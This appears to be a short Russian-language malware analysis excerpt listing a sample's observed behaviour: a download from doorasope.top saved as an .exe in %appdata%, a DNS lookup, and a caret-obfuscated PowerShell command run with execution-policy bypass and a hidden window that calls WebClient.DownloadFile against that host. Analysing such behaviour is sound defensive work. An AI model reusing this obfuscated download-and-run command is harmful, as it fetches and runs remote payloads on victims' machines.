Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^wE^RsheL^L.^ex^e -^ExE^cU^tIOnpO^l^i^cY bYPaSS^ -nopR^O^fIL^e -^wi^ND^Ows^TYle H^iD^dE^N ^(N^ew-obJe^C^T^ ^sys^TEm.^neT.^wE^Bc^liEnT).^D^OW^nLoADfIL^e('http://www.doorasope.top/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pO^wE^RsheL^L.^ex^e -^ExE^cU^tIOnpO^l^i^cY bYPaSS^ -nopR^O^fIL^e -^wi^ND^Ows^TYle H^iD^dE^N ^(N^ew-obJe^C^T^ ^sys^TEm.^neT.^wE^Bc^liEnT).^D^OW^nLoADfIL^e('http://www.doorasope.top/...' (со скрытым окном)